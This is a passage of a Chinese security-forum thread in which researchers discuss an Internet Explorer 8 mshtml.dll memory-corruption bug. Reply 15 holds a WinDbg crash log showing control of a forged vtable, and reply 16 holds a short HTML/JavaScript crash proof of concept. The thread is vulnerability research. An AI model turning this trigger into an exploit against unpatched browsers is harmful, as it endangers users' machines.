能力值:
( LV8,RANK:130 )
|
-
-
2 楼
膜拜楼主的调试功底。
|
能力值:
( LV2,RANK:10 )
|
-
-
3 楼
mark,先顶后看
|
能力值:
( LV17,RANK:1820 )
|
-
-
4 楼
不错,下载学习下
|
能力值:
( LV2,RANK:10 )
|
-
-
5 楼
看看先,厉害的人还是蛮多的
|
能力值:
( LV3,RANK:20 )
|
-
-
6 楼
看作者的调试文档很给力,但是我重现场景不能触发呢?
用文档中修改后的POC,貌似IE没加载mshtml模块啊??
|
能力值:
( LV4,RANK:50 )
|
-
-
7 楼
K.K的功力越来越深
|
能力值:
( LV13,RANK:388 )
|
-
-
8 楼
下载学习 谢谢分享
|
能力值:
( LV17,RANK:1820 )
|
-
-
9 楼
KK熟悉IE解析html的过程啊,求学习资料,各种函数调用这些,或者api文档,求科普
|
能力值:
( LV4,RANK:50 )
|
-
-
10 楼
IE 5 源码 + 符号 + IDA NAME搜索html各种关键字 + 各种推测
|
能力值:
( LV2,RANK:10 )
|
-
-
11 楼
学习了,支持楼主
|
能力值:
( LV17,RANK:1820 )
|
-
-
12 楼
thx................
|
能力值:
( LV2,RANK:10 )
|
-
-
13 楼
感谢楼主分享。什么好东东啊?
|
能力值:
( LV12,RANK:1000 )
|
-
-
14 楼
100台电脑有几台能测试成功啊?这个版本的dll还能找到吗?抽象贴
|
能力值:
( LV13,RANK:388 )
|
-
-
15 楼
不会吧
ie8很稳定重现啊
风水也很好 命中稳定
访问异常就是伪造的 vtable 1c1c1c7c
(720.c68): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1c1c1c0c ebx=00000000 ecx=00321668 edx=00000001 esi=00321668 edi=0208b7c0
eip=68dbc402 esp=0208b758 ebp=0208b764 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc+0x2:
68dbc402 8b5070 mov edx,dword ptr [eax+70h] ds:0023:1c1c1c7c=????????
0:005> uf mshtml!CElement::Doc
mshtml!CElement::Doc:
68dbc400 8b01 mov eax,dword ptr [ecx]
68dbc402 8b5070 mov edx,dword ptr [eax+70h]
68dbc405 ffd2 call edx
68dbc407 8b400c mov eax,dword ptr [eax+0Ch]
68dbc40a c3 ret
|
能力值:
( LV13,RANK:388 )
|
-
-
16 楼
发个简化版 crash poc
<DIV id=testfaild>
<img id="imgTest">
<div id="imgTest"></div>
<input id="4B5F5F4B" onMouseOver="crash();"></input>
</DIV>
<script language="JavaScript">
function crash() {
eval("imgTest").src = "";
}
function trigger() {
var x =document.getElementsByTagName("input");
x[0].fireEvent("onMouseOver");
testfaild.innerHTML = testfaild.innerHTML;
x[0].fireEvent("onMouseOver");
}
trigger();
</script>
|
能力值:
( LV12,RANK:1000 )
|
-
-
17 楼
请问楼上兄弟你的漏洞模块: mshtml.dll 8.0.6001.19222是在哪里找到的?谢谢
我的IE8:
|
能力值:
( LV13,RANK:388 )
|
-
-
18 楼
[QUOTE=天易love;1082710]请问楼上兄弟你的漏洞模块: mshtml.dll 8.0.6001.19222是在哪里找到的?谢谢
我的IE8:
[/QUOTE]
你的ie版本和楼主的倒是一样
我的ie是for win7的所以版本号是8.0.7600.16385
按说这是个新漏洞 只要近期没升级的低一点的版本 应该都很难幸免
可以windbg附加 跑 看看有没有什么异常
|
能力值:
( LV12,RANK:390 )
|
-
-
19 楼
我的ie 8 + window xp sp3 en 没重现出来,头大。。。
|
能力值:
( LV2,RANK:10 )
|
-
-
20 楼
先顶一个 再学习
|
|
|